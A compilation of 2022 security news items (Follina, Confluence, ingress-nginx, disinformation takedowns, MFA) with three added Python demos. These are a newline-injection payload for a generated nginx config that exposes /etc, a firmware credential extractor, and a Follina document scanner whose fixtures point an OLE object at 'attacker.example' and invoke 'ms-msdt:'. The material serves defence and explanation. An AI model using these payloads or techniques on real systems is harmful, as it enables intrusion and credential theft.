- The market share of IE is below 1%, so not a big issue. Browser-specific applications should by now be anomalies – from a security perspective, Chrome-based browsers are the market share big dog that vulnerability management needs to focus on, but Safari, Firefox and Edge will stay in the mix.
- Use Edge with the IE Mode if needed. Suggest rigorous testing without IE Mode to determine your reliance on backwards compatibility, possibly eliminating browser lock in.
Read more in
- What is the Lifecycle policy for Internet Explorer?
- Internet Explorer (almost) breathes its final byte on Wednesday
- June 15: It’s the end of the Internet Explorer era
Google shuts down YouTube Russian propaganda channels
In its quarterly disinformation report for Q2 2022, Google said last week that it suspended more than 190 YouTube channels and 12 Google Ads accounts linked to Russia’s disinformation efforts surrounding its invasion of Ukraine. Forty-four of these accounts were linked to the Internet Research Agency (IRA), the Russian internet troll farm based in Sankt Petersburg, an entity that has been active for years and still operates despite several US Treasury sanctions.
Google said these accounts published content that was supportive of Russia’s invasion of Ukraine and Russian President Vladimir Putin and critical of NATO, Ukraine, Ukrainian President Volodymyr Zelenskyy, and Russian opposition politician Alexei Navalny. Some accounts also tried to justify the activity of Russian private military contractor Wagner Group in Ukraine and Africa, where they have been accused of civilian killings and other atrocities.
Google’s crackdown comes after the company suspended more than 715 YouTube accounts used for the same purpose in the first quarter of the year, and after it delisted multiple Russian state-media news outlets from its Google News section in March.
“The information domain is a critical theater of war for the Kremlin,” said researchers from the Brookings Institution think tank earlier this year in March in a report analyzing news search results for Ukraine-related terms. The report—published before Google moved to remove Russian state media outlets from its News section—found that sites like TASS dominated Google’s search results, helping the Kremlin drive its message to huge audiences.
Companies like Google, Microsoft, Twitter, and Meta (formerly Facebook) have been trying to shut down Russia’s genocide-washing propaganda but with few results, especially on Twitter and Facebook, where copy-pasta bot networks and especially troll farms continue to dominate discussions.
While Twitter and Meta have intervened to limit the reach of official Russian state news outlets, tweets about Ukraine, Russia, and NATO are often flooded with bots and trolls. Similarly, on Facebook, bots and trolls also flood the comments sections in news stories from western media outlets, often driving the discussions toward Russian-friendly narratives.
These disinformation and propaganda efforts mostly follow the same pattern, namely the claim that Ukraine has committed genocide against its Russian-speaking minority and that Russia is only trying to save them, a narrative that has been thoroughly debunked by multiple sources ranging from Russian independent media to the EU itself.
Optimism hack happy ending
The threat actor who intercepted a transfer of nearly $19 million (at the time) between the Wintermute and Optimism cryptocurrency platforms last week has decided to return the stolen funds, according to blockchain security firm PeckShield.
German energy suppliers
German energy suppliers Entega and Mainzer Stadtwerke were hit by cyber-attacks over the weekend. The attacks, believed to be unrelated, blocked access to the companies’ email servers and public websites, but industrial systems remained unaffected.
Wiz, the cloud security firm that discovered the OMIGOD vulnerability last year, has continued its research into the types of middleware products installed by default on cloud servers. The company has published a GitHub repo listing the cloud middleware (aka cloud agents) installed and used across the major cloud service providers (Azure, AWS, and GCP). These agents (13 at the time of writing) are usually installed without the customers’ awareness or explicit consent.
Firefox reducing sandbox escape attack surface
In its quarterly security newsletter for Q1 2022, Mozilla said it deployed a new security feature to Firefox in v96 that will reduce the attack surface for Firefox sandbox escapes (attack from the browser to the underlying OS).
Microsoft’s security team said on Saturday that at least two nation-state groups—tracked as DEV-0401 and DEV-0234—are now exploiting the Atlassian Confluence RCE zero-day vulnerability CVE-2022-26134 that was disclosed last week. Microsoft researchers said that this vulnerability has also been used for device and domain discovery, but also for the deployment of payloads like Cobalt Strike, web shells, botnets like Mirai and Kinsing, coin miners, and even ransomware.
Confiant said in a report last week that it detected a new threat actor—that it named SeaFlower—targeting cryptocurrency users. Since at least March this year, the group has operated websites cloned after legitimate cryptocurrency wallets. These websites, which target Chinese-speaking audiences, host backdoored wallet apps that steal users’ private wallet seeds.
Malwarebytes reported this week that its telemetry indicated that AsyncRAT had become the most widespread malware payload delivered via email spam in the first half of 2022. AsyncRAT was ranked #3 throughout 2021, behind Dridex and TrickBot.
An online scammer was detained in Finland last week after defrauding local car dealerships. Investigators said they identified the suspect from a high-quality photo of a forged check the suspect had sent: one of the suspect’s fingertips was visible in the image, and the print was matched against police records. (h/t @mikko)
Nigerian bank robbers
Nigerian police said they detained three suspects for a daring scheme to hack into the networks of at least 11 Nigerian banks and steal funds. According to authorities, the group had bribed an employee at one of the banks to leave critical network gateways open so they could gain access to the bank network and steal funds. Per data recovered from seized devices, the group was planning to use the same method on 10 other banks if this first intrusion went without a hitch. [Coverage in BankInfoSecurity]
Adconion execs plead guilty
Three of four Adconion executives pleaded guilty last week to fraud and misrepresentation via email. The three were charged in 2018 for hijacking IP address blocks from their inactive owners. Some of these IP addresses were later used to send email spam.
Few NetWalker victims complained
Speaking at the RSA security conference last week, FBI and DOJ officials said that only a quarter of all victims of the NetWalker ransomware filed complaints with authorities. Law enforcement seized NetWalker’s infrastructure in January 2021, and the gang ceased operations following the operation.
Palo Alto Networks has published a technical report on HelloXD, a ransomware strain that has been active since November 2021. The security firm also managed to link the ransomware to a threat actor active on underground cybercrime forums named “x4k.”
Security firm McAfee said it found malicious functionality designed to steal Instagram account credentials in an Android app designed to allow users to modify the default Instagram app and in several apps designed to increase Instagram account followers and post likes.
CERT Ukraine said in a security alert on Friday that the Sandworm APT group was targeting Ukrainian news organizations with malicious emails. Officials said that more than 500 radio stations, newspapers, and news agencies were targeted.
Zscaler has published a report on a .NET-based backdoor that the Lyceum APT has been using to target Middle Eastern organizations in the energy and telecommunication sectors. According to the researchers, the group relies on “DNS hijacking,” in which an attacker-controlled DNS server manipulates the responses to DNS queries in order to redirect targets to malicious sites.
Academics from MIT CSAIL have disclosed a novel attack against Apple M1 processors. The attack, named PACMAN, can elevate access from userland to kernel space by bypassing Pointer Authentication (PAC). The PACMAN attack can be executed via a network.
The Kubernetes ingress-nginx controller is affected by a vulnerability (CVE-2021-25748) in which “a user that can create or update ingress objects can use a newline character to bypass the sanitization” of the path and “obtain the credentials of the ingress-nginx controller.” The Kubernetes team said that in default Kubernetes configurations, this credential has access to all secrets in the cluster.
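To show why a single newline matters when user input is rendered into a generated nginx config, here is an added illustration of the bug class. It is not ingress-nginx’s code and does not claim to reproduce the exact CVE-2021-25748 logic: the allowed-character set, the template and the validator names are assumptions for the example. The vulnerable check only ever validates the first line of the path; the hardened one validates the whole string and refuses control characters.

```python
"""Newline injection through a per-line path check into a generated nginx config.

Added illustration of the bug class the advisory describes; this is not
ingress-nginx's code and does not claim to be the exact CVE-2021-25748 logic.
The vulnerable check validates only up to the first line break, the hardened
one validates the whole string and refuses control characters.
"""
import re

# Characters an Ingress path may contain (assumption made for this example).
PATH_CHARS = r"/[A-Za-z0-9._~%\-/]*"

# Template the (hypothetical) controller renders for every Ingress path.
LOCATION_TEMPLATE = "location {path} {{\n    proxy_pass http://{upstream};\n}}\n"


def validate_path_vulnerable(path: str) -> bool:
    # With re.MULTILINE, $ matches at every line end, so the regex is satisfied
    # by the first line alone; whatever follows the newline is never inspected.
    return re.match("^" + PATH_CHARS + "$", path, re.MULTILINE) is not None


def validate_path_hardened(path: str) -> bool:
    # Reject any control character outright (newline, CR, tab, ...), then
    # require the allowed-character pattern to cover the entire string.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in path):
        return False
    return re.fullmatch(PATH_CHARS, path) is not None


def render_location(path: str, upstream: str, validate) -> str:
    """Render the location block, or raise if the validator rejects the path."""
    if not validate(path):
        raise ValueError("rejected Ingress path: %r" % path)
    return LOCATION_TEMPLATE.format(path=path, upstream=upstream)


# Attacker-controlled path: the first line is clean; the rest closes the
# location early with an alias to /etc and opens a throw-away location so
# the template's own brace still balances. Newlines are whitespace to nginx.
INJECTED_PATH = "/app\n{\n    alias /etc/;\n}\nlocation /discard"


def demo() -> dict:
    out = {"vulnerable": render_location(INJECTED_PATH, "app-svc", validate_path_vulnerable)}
    try:
        render_location(INJECTED_PATH, "app-svc", validate_path_hardened)
        out["hardened"] = "accepted"
    except ValueError as exc:
        out["hardened"] = "rejected: %s" % exc
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print("==", k, "==")
        print(v)
```

The rendered "vulnerable" output is valid nginx configuration in which `location /app` now serves the filesystem under `/etc/`, which is the kind of foothold that turns into reading the controller’s mounted service-account token.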
Trendnet TEW-831DR WiFi routers have been found to have multiple vulnerabilities exposing the owners of the router to potential intrusions of their local WiFi network and possible takeover of the device.
The Drupal CMS has released out-of-cycle security updates to fix bugs in third-party libraries.
Backdoor account in thermal cameras
IoT security company SEC-Consult disclosed last week that IRAY A8Z3 thermal cameras contain hardcoded credentials for their web application in one of the firmware binaries, which can be extracted and used by attackers to modify camera settings. In addition, the same camera model contains several other vulnerabilities. After 16 months, the vendor has yet to patch any of the reported issues.
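Extracting such credentials rarely takes more than a strings-style sweep of the firmware image, because a credential compiled into a web-application binary survives as a plain printable run. The following is an added example, not SEC Consult’s tooling: it pulls printable runs out of a blob and applies a few credential-shaped patterns. The “firmware” is constructed inline (a handful of strings separated by non-printable filler), and the credential values in it are invented.

```python
"""Strings-style sweep of a firmware image for hardcoded credentials.

Added example, not SEC Consult's tooling. Credentials compiled into a
web-application binary usually remain as plain printable strings, so a
printable-run extractor plus a handful of patterns recovers them. The
"firmware" below is constructed: a few strings embedded in filler bytes.
"""
import base64
import re

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")

CRED_PATTERNS = (
    # user:password on its own line; password may not start with "/" (keeps URLs out)
    ("user:pass pair", re.compile(rb"^[A-Za-z0-9_.-]{3,32}:[^\s:/][^\s:]{3,63}$")),
    ("basic-auth header", re.compile(rb"Basic\s+(?P<b64>[A-Za-z0-9+/]{8,}={0,2})")),
    ("password assignment",
     re.compile(rb"(passw(or)?d|passphrase|pwd|secret)\s*[=:]\s*(?P<val>\S{4,})", re.I)),
    ("private key", re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
)


def extract_strings(blob: bytes):
    """Yield (offset, string) for every printable run of 6+ bytes."""
    for m in PRINTABLE_RUN.finditer(blob):
        yield m.start(), m.group()


def find_credentials(blob: bytes) -> list:
    """Return credential-looking strings with their offset and matched pattern."""
    findings = []
    for offset, s in extract_strings(blob):
        for kind, pat in CRED_PATTERNS:
            m = pat.search(s)
            if not m:
                continue
            item = {"offset": offset, "kind": kind, "string": s}
            if kind == "basic-auth header":
                try:
                    item["decoded"] = base64.b64decode(m.group("b64"), validate=True)
                except ValueError:
                    item["decoded"] = None
            findings.append(item)
    return findings


def _filler(n: int) -> bytes:
    # Non-printable padding so each constructed string is an isolated run.
    return bytes((i * 37) % 0x20 for i in range(n))


# Constructed stand-in for a firmware image (all values invented).
FIRMWARE = (
    b"\x7fELF" + _filler(40)
    + b"/cgi-bin/setcamera.cgi" + _filler(12)
    + b"admin:Th3rmal!Cam" + _filler(20)
    + b"Authorization: Basic " + base64.b64encode(b"admin:Th3rmal!Cam") + _filler(16)
    + b"Content-Type: text/html" + _filler(8)
    + b"wpa_passphrase=Default1234" + _filler(24)
)

if __name__ == "__main__":
    for f in find_credentials(FIRMWARE):
        print("0x%06x  %-20s %r" % (f["offset"], f["kind"], f["string"]),
              f.get("decoded", ""))
```

Against a real image you would run this over the unpacked root filesystem (binwalk or similar first), then confirm each hit by finding the code that references the string, since the offset is exactly what you need for that.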
Backdoor in Mitel VoIP phones
Mitel Networks has patched its 6900 IP Series VoIP phones, removing backdoor functionality from the firmware that would have allowed remote attackers to run malicious commands on the devices [1, 2]. The vulnerability was found and reported by German pen-testing firm SySS.
U.S. ordered travel companies to spy on Russian hacker for years
Forbes ($): Solid reporting from @iblametom by way of a Forbes legal challenge that unsealed documents revealing how U.S. authorities obtained a court order to compel travel data companies — Sabre and Travelport — to continually turn over the travel records of notorious Russian hacker Aleksei Burkov to catch him while he traveled outside of Russia. The feds used an obscure provision in U.S. law called the All Writs Act, which might ring a bell for those who lived through Crypto Wars 2.0 when the FBI tried to force Apple to backdoor its own iPhone software to break into a terrorist’s device. Great work here revealing the scope of this kind of underreported surveillance.
Read more in
- U.S. ordered travel companies to spy on Russian hacker for years
- Why the Hell Did America Just Send This Master Cybercriminal Back to Russia?
- The Apple-FBI Debate Over Encryption
- The U.S. forced tech companies to spy on Russian hacker using legal loophole
U.S. warns Chinese hackers are targeting ISPs and telecoms
The Record: Strong warnings from the U.S. government about how Chinese state-sponsored hackers have been targeting internet providers and major telecoms firms around the globe for the past two years by using known vulnerabilities — and what action network defenders can take to protect their organizations. It comes as new research dropped from Sentinel Labs about a new espionage group dubbed Aoqin Dragon, which uses poisoned Word documents to plant a backdoor and get access to the wider network.
Read more in
- US agencies detail the digital ‘plumbing’ used by Chinese state-sponsored hackers
- US: Chinese govt hackers breached telcos to snoop on network traffic
- Chinese ‘Aoqin Dragon’ gang runs undetected ten-year espionage spree
RSA 2022: Cloud providers still using secret middleware
The Register: I didn’t need to go to RSA to still get COVID — but for those who braved the in-person event, The Register has your news rundown covered. Among the highlights are Wiz research that found vulnerabilities in cloud middleware, and a renewed plea from the private sector for government help. Plus, word is getting around about the emerging threat of hacking-for-hire outfits targeting election officials. It’s a tactic seen most recently in Poland and Catalonia. And finally — bonus Enigma in the wild.
Read more in
- OMIGOD: Cloud providers still using secret middleware
- The cloud gray zone—secret agents installed by cloud service providers
- Poland’s phone spyware scandal raises doubts over 2019 election
- Catalan leaders targeted using NSO spyware, say cybersecurity experts
Inside ID.me’s torrid pandemic growth spurt: ill-equipped staff and data-security lapses
@caro1inehaskins back with a fresh inside look at ID.me, the digital identity verification company that caused a ruckus when it secured a deal with the IRS. The reporting shows a growth spurt during the pandemic that left the company unprepared to handle the massive influx of new business, which inevitably led to data security lapses. One former employee said: “It was disturbing to me that my background check wasn’t completed and that I was allowed to take home a computer with people’s information on it.” Yikes. And to think this company secured government contracts. ID.me also laid off employees this week after hiring nearly 1,500 new people during the pandemic.
Read more in
- $1.47 billion identity startup ID.me, which closed deals with unemployment agencies and the IRS, lays off staff after growth spurt
- Inside ID.me’s torrid pandemic growth spurt, which led to frantic hiring, ill-equipped staff, and data-security lapses as the company closed lucrative deals with unemployment agencies and the IRS
- Democrat senators call ID.me’s handling of user data ‘careless, irresponsible, and improper’ after Insider report
How a saxophonist tricked the KGB by encrypting secrets in music
A brilliant story about how U.S. saxophonist Merryl Goldberg devised an encryption scheme that used musical notation to allow her to smuggle information into and out of the former USSR, defying the watchful eyes of the then-KGB. Another great story that came out of RSA. @kennwhite with the stan tweets.
Read more in
How to open a locked Sentry Safe in seconds
A security researcher found a vulnerability that allows the opening of electronic safes from the Sentry Safe and Master Lock company without needing a PIN code. Great walkthrough, including a bonus sneaky method of delivery: a highlighter pen.
Read more in
New Tesla hack gives thieves their own personal key
A flaw in the way Tesla handles its NFC key card, one of the ways of unlocking an owner’s Tesla, gives a would-be attacker a 130-second window after the card is used to enroll a new key and effectively take over the car. “If a vehicle owner normally uses the phone app to unlock the car—by far the most common unlocking method for Teslas — the attacker can force the use of the NFC card by using a signal jammer to block the BLE frequency used by Tesla’s phone-as-a-key app.”
Read more in
OneTrust has ‘record’ quarters, still lays off 25% staff
Privacy unicorn OneTrust has been growing from strength to strength — if its statements are to be believed — with “record quarters and increasing customer demand,” reports Insider ($). But the Softbank-backed giant is cutting a quarter of its staff, some 950 employees, all the while splashing the cash at RSA. Cybereason also acknowledged layoffs despite a $3 billion valuation.
Read more in
- SoftBank-backed OneTrust laid off 25% of its staff 1 month after the privacy-management startup predicted ‘record quarters and increasing customer demand’
- Billion-Dollar Valuations Can’t Halt Layoffs at OneTrust, Cybereason
Feds shutter marketplace selling SSNs
SSNDOB, a series of websites that listed about 24 million Social Security numbers and other personal information, has been seized by U.S. and Cyprus authorities. The crime market netted some $19 million in sales over the past ten years — or more than $22 million in Bitcoin, per Chainalysis. SSNDOB has been active since at least 2013.
Read more in
- SSNDOB Shutdown: DOJ Announces Closure of Darknet Market Selling Social Security Numbers and Other Personally Identifiable Information
- Credit Reports Sold for Cheap in the Underweb
Microsoft mum on Follina exploit
Tech giant Microsoft is reportedly in “no hurry” to patch the Follina vulnerability under active attack, which exploits a bug in Office documents that crucially doesn’t require macros to work. Simply previewing a document will render a device compromised. The bug is already being exploited to infect devices with the Qbot malware and ransomware. But Microsoft has said very little since it acknowledged the bug as a vulnerability with a 7.8 out of 10 severity rating.
Read more in
- Now Windows Follina zero-day exploited to infect PCs with Qbot
- Follina — a Microsoft Office code execution vulnerability
US Government Agencies with Legacy Systems Face Struggle to Implement MFA
Eric Goldstein, CISA executive assistant director for cybersecurity told Cyberscoop that US government agencies with legacy systems may have difficulty implementing multi-factor authentication (MFA). Agencies were required to have implemented MFA by November 2021 as per a May 2021 executive order. The Biden administration is seeking $300 million for FY 2023 for the Technology Modernization Fund, which will be used to help agencies upgrade outdated IT systems.
- Implementing MFA usually implies implementing some form of SSO/IAM. Many organizations struggle not only with legacy systems, but also new SaaS offerings that only offer integration with standards like SAML for a substantial additional fee. 100% MFA is (sadly) not always realistic and you will have to consider other controls for systems that do not support MFA. For example, you could require access via a VPN that uses MFA. For SaaS platforms: Pay up or find an alternative.
- Over the years this has been the “the dog ate my homework” excuse for government agencies that are slow to make basic security hygiene improvements. History note: in 2001 a federal judge ordered the Bureau of Indian affairs to disconnect from the Internet because it could not protect Native American trust information. Some BIA offices were not allowed to reconnect until *2008*. We are at the point where failure to move away from reusable passwords on government networks (all networks, really) is a reason to say, “No Internet for you.”
- Many initiatives which expect MFA implementations assume applications are modernized to support current authentication mechanisms, such as SAML and a federated IDP, where enforcing MFA is a configuration task. Legacy applications are sometimes fitted with new entry points which themselves support MFA; in so doing, care must be taken to not leave a path to the old less secure entry point. In the past we have raised the bar by implementing solutions which leveraged the password field for their one-time authenticator and then augmenting the password validation process. Note that current directives require phishing-resistant MFA, which means this too may need updating. When replacing legacy systems, plan carefully, not only for acquisition and implementation but also business process re-engineering. Avoid the trap of modification of the new solution to implement old business models which can result in an increased mortgage and make future updates challenging if not impossible.
- Systems that are resistant to such a simple but powerful measure should be candidates for replacement rather than simply upgrade. While some argue that strong authentication is the most efficient security measure, it is unarguable that it is in the top three.
Read more in
Android Updates for June 2022
Google has released its Android updates for June 2022. Of the 41 vulnerabilities addressed in the updates, five are rated critical. There are updates available for Android 10, 11, and 12. Among the vulnerabilities addressed are a remote code execution flaw in Android Media Framework and a denial of service/remote code execution vulnerability in Unisoc chip firmware.
- Some Android phones (such as Google Pixel models) will get these updates fast, others (in the past most Samsung phones) will not. Spot check a few different makes of phones across your security team and warn users of those phones they are at risk.
- Note that the source code for the fixes is released to the AOSP repository 48 hours after the security bulletin is released, and your device manufacturers are notified a month before this is published. Which all means that attackers can now start reverse engineering the flaws and, more importantly, don’t wait on applying updates once published. If your OEM is not providing updates rapidly, you may want to assess the risk of their lagging behind and decide if another provider is appropriate.
Read more in
- Android Security Bulletin—June 2022
- Time to update: Google’s Android updates fixes 41 flaws, five critical
Facebook Phishing Campaign
A phishing campaign targeting Facebook and Messenger users has stolen millions of account credentials and tens of millions of dollars. The phishing campaign operates by sending a malicious link in DMs from compromised accounts. The link redirects recipients through a series of pages containing ads, ultimately landing on a phony Facebook login page. The campaign has been ongoing since late 2021.
- Facebook Direct Messenger is kinda like the Red Dye #2 of Internet communications – it really ought to be banned and replaced with something that at least has the same level of filtering that all email and SMS messaging gets these days. A warning about Facebook Messenger should be part of your security awareness outreach, as all too often security awareness videos that users have to watch will just talk generically – in many cases, warnings about using specific products and services are justified and needed.
- The attack includes about 400 unique Facebook phishing pages; analysis of 17 found an average of 985,228 visits. The attacker claims they net about $150 for every 1000 visits. Be careful with FB Messenger: make sure that messages are really coming from your friends, particularly when one shows up from someone you’re not accustomed to using Messenger with. I suggest verifying their status through other mechanisms. The URLs shared are using common URL generators like litch.me, famous.co, amaze.co and funnel-preview.com, which are also used by legitimate apps. That said, if you’re not used to getting links from these domains, don’t click them.
- A key here is when training your workforce on “phishing,” emphasize that phishing is no longer just email attacks, but SMS, voice phishing or on social media. Focus less on the medium that is used and more on the most common indicators of a social engineering attack; they are often the same, tremendous sense of urgency being one of the most common.
Read more in
- Facebook phishing campaign nets millions in IDs and cash
- Massive Facebook Messenger phishing operation generates millions
New Microsoft Defender Feature Isolates Unmanaged Devices
A new feature in Microsoft Defender for Endpoint (MDE) allows administrators to “contain” unmanaged (not enrolled in MDE) devices and devices suspected of being compromised. The feature is designed to prevent threat actors from moving laterally within organizations. MDE will tell enrolled devices to block all communication with devices tagged as “contained.” The “contain” feature works only on enrolled devices running Windows 10 or later or Windows Server 2019 or later.
- This is essentially good old-fashioned NAC (Network Access Control) which is really the foundation for any form of “Zero Trust.” (History note: Microsoft called it Network Access Protection and Cisco called it Network Admission Control back in the day.) NAC got a bad name 15 years ago due to interoperability issues across vendors and because it was mainly used to keep unpatched PCs from connecting – which punished the users for an IT ops failure to patch. Prioritize a testbed network segment to try it out – you will likely need to do some upskilling to deal with false positives, defining “contain” to balance security with disruption, and in threat hunting skills to investigate the devices being contained.
- Pay attention to how this works. If it fits your environment, you should definitely start piloting the capability. You can only use this capability on MDE devices, and the controls only work against other MDE devices. That said, this is an effective way of removing access to resources for devices which are compromised or otherwise don’t meet your acceptable level of risk. Also, containment is tied to machine identity rather than IP address, so access is blocked irrespective of connection location or IP.
Read more in
- Prevent compromised unmanaged devices from moving laterally in your organization with “Contain”
- Microsoft Defender now isolates hacked, unmanaged Windows devices
Sophos Says Dwell Time Increased in 2021
Sophos has published its Active Adversary Playbook 2022, which “details the main adversaries, tools, and attack behaviors seen in the wild during 2021 by Sophos’ frontline incident responders.” The report found that average dwell time for cyber intruders increased from 11 days in 2020 to 15 days in 2021. Healthcare organizations had on average the shortest dwell time (8.5 days), while educational institutions had the longest (34 days). Average dwell time was higher (more than 50 days) for companies with 250 or fewer employees than for larger organizations.
- Make sure your detection and response capabilities are where they need to be. Talk to your defenders to find where they have gaps, then take steps to address them. Make sure that you’re leveraging all the tools and automation available from your services. If you’re too small to insource your defense, talk to your service provider to make sure you have sufficient coverage. Lastly, schedule regular assessments and tests to verify you’re where you should be. Don’t forget to leverage resources from your local CISA, ISAC etc.
- While not a good statistic, it is better than in years past when average dwell time was measured in months, not weeks. However, the most recent DBIR report had a disturbing metric about dwell time: over 50% of breaches were self-reported by the cyber attacker. In other words, the victim found out about the breach from the attacker themselves (primarily ransomware).
Read more in
- The Active Adversary Playbook 2022
- Sophos uncovers latest cyber attack trends in Playbook report
- Hackers are now hiding inside networks for longer. That’s not a good sign
Follina is Being Actively Exploited to Spread Malware
Threat actors continue to exploit the Follina vulnerability in Windows (CVE-2022-30190) to spread malware. In addition to the phishing attacks targeting European and US government entities with Qbot malware, as noted by Proofpoint, Symantec has detected threat actors exploiting the vulnerability to spread AsyncRAT.
- Remember we were holding off on disabling MSDT? It’s time to re-assess. Your endpoint and other protection services are updating their protections. The attacks are coming from multiple well-resourced organizations. You need defense in depth.
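Both Follina items above (the “no hurry” note and this one) describe the same delivery chain: a Word document whose OLE object relationship points at an external URL, from which an HTML page invokes the ms-msdt: handler. That chain is visible inside the .docx package before anything is rendered, which is what the following added example checks. It is not Microsoft’s, Proofpoint’s or Symantec’s code; the three documents are built in memory and are not real samples, and the attacker hostname and MSDT arguments in them are placeholders.

```python
"""Flag Word documents that use the Follina (CVE-2022-30190) delivery chain.

Added example; not Microsoft's, Proofpoint's or Symantec's code. The maldoc
carries an OLE object relationship whose target is an external URL; the HTML
fetched from it invokes the ms-msdt: handler. Later variants put an
ms-msdt: URI straight into a hyperlink. All documents below are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
MSDT_RE = re.compile(rb"ms-msdt:", re.I)


def scan_docx(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(blob)
                for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                    if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL_TYPE:
                        findings.append("%s: external OLE object -> %s" % (name, rel.get("Target")))
            if MSDT_RE.search(blob):
                findings.append("%s: references the ms-msdt: protocol handler" % name)
    return findings


def make_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx package around the given document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_HEAD = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">' % PKG_REL_NS

# Ordinary document: one external hyperlink, which is normal and not flagged.
BENIGN_DOC = make_docx(RELS_HEAD + (
    '<Relationship Id="rId1" Type="%s" Target="https://www.example.com/" TargetMode="External"/>'
    '</Relationships>' % HYPERLINK_REL_TYPE))

# Follina-style document: the OLE object is fetched from an attacker URL
# (placeholder host; the trailing "!" appears in publicly analysed samples).
MALICIOUS_DOC = make_docx(RELS_HEAD + (
    '<Relationship Id="rId5" Type="%s" Target="http://attacker.example/payload.html!" TargetMode="External"/>'
    '</Relationships>' % OLE_REL_TYPE))

# Later variant: a hyperlink that invokes MSDT directly (arguments are placeholders).
HYPERLINK_DOC = make_docx(RELS_HEAD + (
    '<Relationship Id="rId2" Type="%s" Target="ms-msdt:/id PCWDiagnostic /skip force" TargetMode="External"/>'
    '</Relationships>' % HYPERLINK_REL_TYPE))

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("ole", MALICIOUS_DOC), ("hyperlink", HYPERLINK_DOC)):
        print(label, scan_docx(doc) or "clean")
```

Run it over mail-gateway attachments or a quarantine folder; an external OLE object relationship is unusual enough in ordinary business documents that it is worth a block-and-review rule on its own, independent of whether MSDT has been disabled on the endpoints.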
Read more in
- ‘Follina’ Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware
- Now Windows Follina zero-day exploited to infect PCs with Qbot
- Symantec: More malware operators moving in to exploit Follina
- Attackers Exploit MSDT Follina Bug to Drop RAT, Infostealer
Joint Advisory: China Exploits Known Vulnerabilities to Target Telecoms
In a joint advisory, the US National Security Agency (NSA), the FBI, and the Cybersecurity and Infrastructure Security Agency (CISA) warn that Chinese “state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure.” The advisory lists 16 known vulnerabilities the hackers have been exploiting to infiltrate networking devices from 10 vendors.
- These are not new vulnerabilities. They range from 2017 to 2021, and most are in network equipment (firewalls, switches, access points, NAS.) It is paramount to make sure that your boundary protection and network devices are kept updated and secure, particularly as more segmentation and NAC solutions are implemented to support a more flexible service access model such as zero trust.
Read more in
- People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
- Beijing-backed baddies target unpatched networking kit to attack telcos
- US warns Chinese hackers exploiting known vulnerabilities in espionage campaign on telecoms
- NSA, FBI warning: Hackers are using these flaws to target VPNs and network devices
- China-Sponsored Cyberattackers Target Networking Gear to Build Widespread Attack Infrastructure
- Fed cyber officials detail Chinese state hackers using common exploits against telcos
CISA’s Cyber Innovations Fellows Initiative
The US Cybersecurity and Infrastructure Security Agency’s (CISA’s) Cyber Innovations Fellows program will bring experts from the private sector to work at the agency part-time for up to four months. The fellows will bring “their expertise to some of our most critical teams.” CISA will hire the first group of up to eight fellows later this year.
- CISA has been working hard to raise the bar for both public and private sector cyber security. Even so, it has been noted that some of the CISA directives are not viable in the real world. This is an exciting opportunity to infuse real world experience and expertise into their processes as well as gain insight and understanding you can bring back. They are looking for a broad range of expertise including AI, ML, Cyber Risk, Remediation, Cloud, SBOM and Threat intel. If you’re interested read the CISA Prospective Cyber Fellow Candidates page for details: https://www.cisa.gov/prospective-cyber-fellow-candidates
Read more in
- Cyber Innovation Fellows Initiative
- Private-sector fellows to work with CISA on cloud security, threat intelligence
CISA Adds 39 Flaws to Known Exploited Vulnerabilities Catalog
This week, the US Cybersecurity and Infrastructure Security Agency (CISA) has added 39 flaws to its Known Exploited Vulnerabilities Catalog, 36 on Wednesday, June 8 and three more on Thursday, June 9. The flaws have mitigation due dates between June 22 and June 30.
- Note that there are multiple vulnerabilities which can be resolved with a single update, such as pushing the latest Chromium, Acrobat and Microsoft updates. Note there are some Flash Player issues listed. It is past time to remove Flash with extreme prejudice. CISA has also updated their guidance and FAQs associated with the KEV catalog: https://www.cisa.gov/uscert/ncas/current-activity/2022/06/07/cisa-provides-criteria-and-process-updates-kev-catalog
- This database is becoming quite large. It demonstrates how porous our environment is. Items in the catalog should get priority when patching.
Read more in
- CISA Adds 36 Known Exploited Vulnerabilities to Catalog
- CISA warning: Hackers are exploiting these 36 “significant” cybersecurity vulnerabilities – so patch now
- Known Exploited Vulnerabilities Catalog
Public exploit code worsens Atlassian Confluence vulnerability scenario
Threat actors continue to target unpatched versions of Atlassian Confluence with public exploits. The vulnerability, CVE-2022-26134, initially arrived as a zero-day last week that affects all versions of the popular collaboration tool. If exploited, the attacker could completely take over the host and execute remote code on the targeted machine. The vulnerability itself appears to be an OGNL injection vulnerability specifically impacting the web server and can be exploited via an HTTP request. It appears that all HTTP methods are vulnerable as well. The exploitation appears to be relatively straightforward and should be resolved immediately either through patching or other mitigations. Although a patch is publicly available, many instances of the software remain unpatched.
Read more in
